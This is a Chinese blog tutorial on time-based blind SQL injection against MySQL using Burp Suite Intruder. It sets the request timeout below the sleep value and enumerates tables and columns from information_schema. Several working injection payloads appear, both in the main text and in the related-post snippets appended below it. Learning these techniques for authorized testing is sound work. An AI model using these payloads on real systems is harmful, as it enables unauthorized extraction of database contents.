使用burpsuite进行延时注入

于 2024-08-05 13:15:00 发布
阅读量1.5k 收藏 46
点赞数 43
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Palpitate_LL/article/details/140847943
版权

#0x00 Burp和延时注入

使用浏览器进行延时注入时,可以很直观地感受到时间上的延时,但是使用Burpsuite就不行。使用Burpsuite进行延时注入虽然不能直观地感受到延时,但是可以通过别的方式来判断。下面是在延时注入前,对Burpsuite的设置。

简单介绍一下图中红框里的几个参数。

  • 正常(Normal ) - 此设置用于大多数网络通信,并确定Burp怎样放弃请求和记录已发生超时前等待。
  • 开放式应答(Open-ended responses) - 该设置只用在一个响应正在处理不包含内容长度或传输编码HTTP标头。在这种情况下,Burp确定传输已经完成之前等待指定的时间间隔。
  • 域名解析(Domain name resolution ) - 此设置确定Burp如何重新进行成功的域名查找,如果目标主机地址频繁变化时需要设定为一个适当的低的值。
  • 失败的域名解析(Failed domain name resolution ) - 此设置确定Burp多久会重新尝试不成功的域名查找。

这些参数的单位都是秒。这里我们需要修改的是第一个参数,即Normal,将其设置为一个比你延时注入的sleep参数小就行。

设置好以后,只要是请求时间超过该值,burpsuite就会丢弃这个请求,你是不会看到该请求的响应的。我们可以利用这个特性来判断延时。

#0x01 使用Burpsuite进行延时注入

这里我先将Normal参数设置为3,一会注入时sleep参数我会设置为7。

#猜解表名

#先猜表的数量

payload: 1' and if((select count(table_name) from information_schema.tables where table_schema=database())=++1++, sleep(7), sleep(0))--+

先设置标志,这里要枚举的是表的数量,就是payload中斜体部分。

枚举的payload设置为数字类型,范围在1-20。

爆破的结果里,只要是没有长度的,都是超时的,没有响应的。

由此可以得出,当前库里有9个表。

PS:在进行爆破时,一定要等到右下角为Finshed时,才会有结果。

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
1.网络安全多个方向学习路线
2.全网最全的CTF入门学习资料
3.一线大佬实战经验分享笔记
4.网安大厂面试题合集
5.红蓝对抗实战技术秘籍
6.网络安全基础入门、Linux、web安全、渗透测试方面视频

#猜解第一个表

先猜长度

payload:1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=++1++, sleep(7), sleep(0))--+ 可以得到第一个表名的长度为7

接下来猜表名

payload:1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1), ++1++, 1)=’++a++’, sleep(7), sleep(0))--+

因为这里需要枚举字符位置和字符内容,所以需要使用Cluster bomb模式。

第一个枚举payload是字符的位置,数字类型,范围是1-7.

第二个枚举payload是字符的内容,这里我使用的是ascii范围内可打印的所有字符。

0123456789abcdefghijklmnopqrstuvwxyz!"#$%&'()*+,-./:;<=>?@[]^_`{|}~

这里不包含大写字母,因为mysql不区分大小写。

由爆破结果得到,第一个表名叫comment

PS:先点payload1排序,在点length排序。

#猜解comment表的字段名

先猜字段数量

payload:1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name='comment')=++1++, sleep(7), sleep(0))--+

这里枚举的是字段数量。

通过爆破结果,可以得到comment表由4个字段。

接下来猜解comment表的第一个字段名。

先猜长度。

paylaod:1' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='comment' limit 0, 1))=++1++, sleep(7), sleep(0))--++

可以得知,第一个字段名长度为2.

找到一个非常nice的入门课程,复制链接即可报名:

https://mp.weixin.qq.com/s/1zfw9KVenN-U_jfpNZbbyw

猜解具体名称

payload:1' and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='comment' limit 0, 1), ++1++, 1)='++a++', sleep(7), sleep(0))--+

因为这里需要枚举字符位置和字符内容,所以需要使用Cluster bomb模式。

可以得知,第一个字段名称为id

使用Burpsuite进行延时注入的过程就大致如此,获取其他数据的方法与此类似。

Palpitate_LL
关注
  • 43
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BurpSuite实战十八之自动化SQL注入渗透测试
悦分享
06-12 1891
在OWSAP Top 10中,注入型漏洞是排在第一位的,而在注入型漏洞中,SQL注入是远比命令行注入、Xpath注入、Ldap注入更常见。这就是本章要讲述的主要内容:在web应用程序的渗透测试中,如何使用Burp和Sqlmap的组合来进行SQL注入漏洞的测试。在讲述本章内容之前,默认为读者熟悉SQL的原理和SqlMap的基本使用,如果有不明白的同学,请先阅读《SQL注入攻击与防御》一书和SqlMap手册(最好是阅读官方文档)。本章包含的内容有:使用gason插件+SqlMap测试SQL注入漏洞在正式开始本章
BurpSuite实战八之使用Burp Intruder
悦分享
06-11 2602
Burp Intruder作为Burp Suite中一款功能极其强大的自动化测试工具,通常被系统安全渗透测试人员被使用在各种任务测试的场景中。本章我们主要学习的内容有:Intruder使用场景和操作步骤Payload 类 型 与 处 理Payload 位置和攻击类型可选项设置(Options)Intruder 攻击和结果分析Intruder使用场景和操作步骤在渗透测试过程中,我们经常使用Burp Intruder,它的工作原理是:Intruder在原始请求数据的基础上,通过修改各种请求参数,以获取不同的请求
Mysql注入 -- 延时注入
weixin_41489908的博客
05-16 2845
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
mysql延迟注入是什么_mysql 延时注入新思路
weixin_42292183的博客
01-19 328
转自先知社区https://xz.aliyun.com/t/2288在4月的pwnhub比赛中,我们遇到了一个比较神奇的问题,如果在注入中遇到需要延时注入的情况,但服务端过滤了我们一般使用的sleep和benchmark函数,这时候我们有没有办法使用别的方式来替代这两个函数造成延时呢?这里可以代码看看require 'conn.php';$id = $_GET['id'];if(preg_matc...
Burp延时爆破
Cocqi的博客
09-21 3430
主要控制好线程数和每次提交时间的间隔就可以实现 慢速爆破,但是耗时较长。关于burp爆破某些参数的过快时会导致被检测。所以控制每次提交数据包的速度,防止被检测。
2020-07-13 SQL盲注(延时注入)
昨天今天下雨天的博客
07-13 424
思路: *判断是否存在注入注入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断注入类型 payload result 1’ and sleep(5) # 延迟 1 and sleep(5)# 没有延迟 存在字符型注入 2猜解当前数据库名 2.1猜解数据库名的长度: payload result 1’ and if(length(database())...
基于报错和延时注入(不限场景)
hackzkaq的博客
07-12 273
这几天沉迷于研究sql注入的知识,碰巧在一本书中看到有一个基于sql语句逻辑的报错思想,根据该报错思想进行构造sql语句之后,发现构造的sql语句可以通过insert,delete,update包括select都可以进行延时注入,由于该延时是和sql语句执行之后的语法报错关联在一起的,所以标题就起名为《基于报错和延时注入(不限场景)》了。 – 页面中返回的false代表当前的insert语句没执行成功,插入失败。– insert中构造payload时,需要使用|进行连接,否则payload会执行错误,并且
BurpSuite 爆破 SQL 注入
MZa1213123的博客
03-03 2131
靶场 用 burpsuite 进行抓包 (最好是用专业版 可以设置多线程快速爆破) 右键该页面 Send to Intruder 首先将 Attack type 改为 Cluster bomb 接着 Clear 清除全部变量 然后 Add 变量到 username 和 password 的地方 设置 payload payload 1 选择 Runtime file 也就是自己选择的字典 我这个是 kali 自带的 SQL.txt payload 2 选择 Simple lis
使用Burpsuite进行半自动注入 布尔盲注和时间盲注 个人总结
代码审计
03-26 4153
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
BurpExtender:Burp suite 的插件集合
05-06
BurpSuite 插件 所有插件都是用python2开发的 SQL注入检测插件 暂时只能检测报错注入延时注入 一定要加载模块目录 加载插件,将xml目录放在Passive_SQL_Check.py同目录下 出现successful说明成功加载,此时如果...
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4879
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
Burp Suite序列之目录扫描
xsq123的专栏
12-01 1881
通过以上五个步骤,我们就可以使用Burp Suite进行目录扫描了。Burp Suite不仅可以爆破账号密码,还可以用来爆破目录。使用Burp Suite进行目录扫描有以下优点:无需安装其他工具,只需打开Burp Suite即可无需手动输入网址和字典,只需在浏览器中访问目标网站即可无需切换工具,只需在Burp Suite中选择相应的模块即可可以与其他渗透测试工具协同工作,方便整合当然,Burp Suite也有一些缺点,比如说:需要付费才能使用完整功能需要一定的学习成本才能掌握。
性能测试基础知识
myh919的博客
04-06 1903
如果给你一个网站,如何判断这个网站的性能是否达标?一般情况下会考虑下,判断的标准有哪些,实际结果有哪些?和标准的对比结果有哪些。因此本节课列举常见的性能测试指标问题。
sql注入:延时注入python万能脚本
一个努力学习网安的小牛马
11-08 288
【代码】sql注入:延时注入python脚本。
Burp Suite使用进阶
爱国小白帽
06-01 1958
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
burp基础使用
weixin_74737710的博客
07-29 149
爆破完成后 点击length排序(成功的数据包和失败的数据包 返回值不一样) 那串字符既是密码。在登陆页面填上上账户名(假设知道账户名) 随便填一串密码 抓包。需要装burp的证书 才能抓https(自行搜索)将要爆破的字符串括起来 点右边的add。将这里的0 改成500(0.5秒一次)还可以使用浏览器插件 (不介绍了)如果网站有防ct攻击 需要加上延时。forward 把数据包放回。点击开关 有数据显示即完成抓包。可以在设置里 如下图所示。drop 把数据包丢掉。
BurpSuite使用指南-使用Burp Intruder
最新发布
2201_75735270的博客
04-01 1444
共有8个占位,每一个占位可以指定简单列表的Payload类型,然后根据占位的多少,与每一个简单列表的Payload进行笛卡尔积,生成最终的Payload列表例如,某个参数的值格式是username@@password将会生成大量的这种格式参数。
SQL注入时间延迟型注入
DM766924的博客
09-16 1530
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
暴力破解之绕过登录次数限制,同时根据响应时间判断有效的用户名
weixin_43618066的博客
11-19 6899
一.尝试输入账户密码,根据错误消息判断
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值